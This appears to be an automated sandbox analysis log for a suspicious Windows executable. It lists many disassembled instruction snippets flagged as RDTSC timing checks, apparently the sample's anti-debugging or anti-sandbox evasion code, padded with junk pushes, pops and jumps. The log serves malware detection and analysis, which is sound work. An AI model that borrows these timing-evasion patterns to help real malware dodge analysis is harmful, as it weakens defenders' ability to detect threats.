Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CAFD9D second address: CAFDA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 pop esi 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C361A8 second address: C361D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F804CF71E7Eh 0x0000000c popad 0x0000000d pushad 0x0000000e js 00007F804CF71E78h 0x00000014 pushad 0x00000015 popad 0x00000016 jne 00007F804CF71E78h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C361D3 second address: C361D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C46F67 second address: C46F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C43A88 second address: C43A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C43A8C second address: C43A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C43A92 second address: C43AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F804C8F2D9Ah 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CB8AEF second address: CB8AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CB908B second address: CB908F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CB908F second address: CB90CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F804CF71E89h 0x0000000e pop edx 0x0000000f jl 00007F804CF71E9Fh 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CB93E5 second address: CB93ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CB93ED second address: CB93F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CB93F6 second address: CB93FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CB96EC second address: CB9700 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F804CF71E7Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CB9700 second address: CB970E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 js 00007F804C8F2D96h 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CB970E second address: CB971A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F804CF71E76h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CB971A second address: CB9724 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F804C8F2D96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CB9991 second address: CB9995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CB9995 second address: CB99A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F804C8F2D98h 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CC0C14 second address: CC0C24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F804CF71E8Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CBFCA7 second address: CBFCD7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F804C8F2D9Ah 0x00000008 jmp 00007F804C8F2DA9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jo 00007F804C8F2DA2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CBFCD7 second address: CBFCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CBFCDD second address: CBFCFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007F804C8F2DA4h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CBFCFD second address: CBFD01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CBFF57 second address: CBFF63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CBFF63 second address: CBFF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CBFF69 second address: CBFF6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CBFF6D second address: CBFF92 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F804CF71E76h 0x00000008 jmp 00007F804CF71E83h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F804CF71E7Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CC0207 second address: CC0215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F804C8F2D9Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CC0215 second address: CC022B instructions: 0x00000000 rdtsc 0x00000002 js 00007F804CF71E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F804CF71E7Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CC022B second address: CC0233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CC0233 second address: CC0237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CC0522 second address: CC053F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CC053F second address: CC0543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CC3064 second address: CC306F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F804C8F2D96h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C31137 second address: C31151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C31151 second address: C31156 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C31156 second address: C31160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C83908 second address: C83932 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F804C8F2D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F804C8F2DA9h 0x0000000f popad 0x00000010 push eax 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C83A2E second address: C83A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jbe 00007F804CF71E89h 0x0000000e pushad 0x0000000f jmp 00007F804CF71E7Fh 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 nop 0x00000018 mov cl, D5h 0x0000001a push 0000001Eh 0x0000001c push edx 0x0000001d push edx 0x0000001e call 00007F804CF71E7Eh 0x00000023 pop edx 0x00000024 pop ecx 0x00000025 pop edx 0x00000026 add edi, 6F9CB1F9h 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jl 00007F804CF71E76h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C3111A second address: C31137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jl 00007F804C8F2D96h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jp 00007F804C8F2D96h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CD0353 second address: CD0357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CD342C second address: CD3432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CD3432 second address: CD3442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jns 00007F804CF71E78h 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CD35B8 second address: CD35F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F804C8F2DA9h 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jnl 00007F804C8F2D96h 0x00000015 jmp 00007F804C8F2DA0h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CD38A7 second address: CD38C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F804CF71E76h 0x0000000a jmp 00007F804CF71E83h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CD38C4 second address: CD38CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CD3D32 second address: CD3D5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F804CF71E83h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CD3D5A second address: CD3D5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CD9314 second address: CD9318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CD9478 second address: CD947C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CD947C second address: CD949C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E86h 0x00000007 ja 00007F804CF71E76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CD95EB second address: CD95F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F804C8F2D96h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CD9E72 second address: CD9E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CDA6E8 second address: CDA6ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CDA6ED second address: CDA6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CDAFDA second address: CDAFE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CDAFE0 second address: CDB008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F804CF71E80h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F804CF71E7Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE1EFB second address: CE1F5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F804C8F2DA3h 0x0000000e jmp 00007F804C8F2DA8h 0x00000013 pop ebx 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 pop edx 0x00000018 popad 0x00000019 pushad 0x0000001a jns 00007F804C8F2DA0h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F804C8F2DA5h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE1F5D second address: CE1F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F804CF71E76h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE4F2E second address: CE4F32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE52F9 second address: CE5319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F804CF71E7Dh 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE5319 second address: CE5327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F804C8F2D96h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE5487 second address: CE549B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F804CF71E7Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE549B second address: CE54AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jng 00007F804C8F2D96h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE54AA second address: CE54B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE55DF second address: CE55FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F804C8F2D96h 0x0000000a pop edx 0x0000000b jnp 00007F804C8F2DA2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE55FC second address: CE5636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007F804CF71E88h 0x00000010 jmp 00007F804CF71E82h 0x00000015 push eax 0x00000016 push edx 0x00000017 jno 00007F804CF71E76h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE57AE second address: CE57B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE57B4 second address: CE57D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F804CF71E78h 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F804CF71E7Fh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE57D7 second address: CE57E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEDEB8 second address: CEDEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEDEBE second address: CEDEC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEDEC9 second address: CEDED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEDED8 second address: CEDF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jns 00007F804C8F2D96h 0x0000000c jmp 00007F804C8F2DA8h 0x00000011 je 00007F804C8F2D96h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEC1E6 second address: CEC1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F804CF71E76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEC33B second address: CEC365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F804C8F2D96h 0x0000000a popad 0x0000000b jns 00007F804C8F2DAFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEC365 second address: CEC382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F804CF71E84h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEC613 second address: CEC617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CECF55 second address: CECF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F804CF71E89h 0x00000009 pop esi 0x0000000a js 00007F804CF71E7Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CECF7B second address: CECF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jmp 00007F804C8F2D9Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CECF8F second address: CECF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 ja 00007F804CF71E76h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEDD6C second address: CEDD72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CF101E second address: CF1024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CF1024 second address: CF1042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F804C8F2DA6h 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CF5DCA second address: CF5DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C3CDE2 second address: C3CDE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D02257 second address: D0225B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D023CE second address: D023E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2DA1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D082DD second address: D082EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F804CF71E76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D082EC second address: D08309 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
